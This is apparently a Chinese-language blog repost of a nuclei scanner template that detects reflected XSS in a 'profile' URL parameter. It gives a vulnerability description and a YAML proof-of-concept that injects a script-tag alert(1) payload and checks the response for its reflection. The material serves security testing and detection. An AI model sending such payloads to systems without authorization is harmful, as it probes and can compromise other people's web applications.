XSS Detection in Profile Parameter

漏洞信息

漏洞名称: XSS Detection in Profile Parameter

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: 该漏洞模板用于检测profile参数中的跨站脚本(XSS)漏洞。通过注入测试负载(如"><script>alert(1)</script>)并观察响应中的反射,可以识别出潜在的XSS漏洞。XSS漏洞允许攻击者在受害者的浏览器中执行恶意脚本,可能导致会话劫持、钓鱼攻击或其他恶意行为。这种漏洞通常由于应用程序未对用户输入进行适当的过滤或转义而产生。在本例中,漏洞的检测依赖于响应体中是否包含注入的脚本标签以及响应头是否为text/html类型。这表明应用程序可能未对profile参数进行充分的输入验证,从而使得XSS攻击成为可能。由于XSS漏洞的利用通常不需要认证,且可以自动化执行,因此它们对Web应用构成了显著的安全风险。

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d3c49d1b7e4b8aea0faf14117eb90a886a25d862/xss-profile-parameter.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

id: xss-profile-parameter

info:
name: XSS Detection in Profile Parameter
author: ProjectDiscoveryAI
severity: medium
description: |
Detects potential XSS vulnerabilities in the `profile` parameter by injecting test payloads and observing reflections in the response.
tags: xss,dast

http:
- method: GET
path:
- "{{BaseURL}}/?profile=\"><script>alert(1)</script>"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"

- type: word
part: header
words:
- "text/html"


XSS Detection in Profile Parameter
http://example.com/2025/07/24/github_908142437/
作者
lianccc
发布于
2025年7月24日
许可协议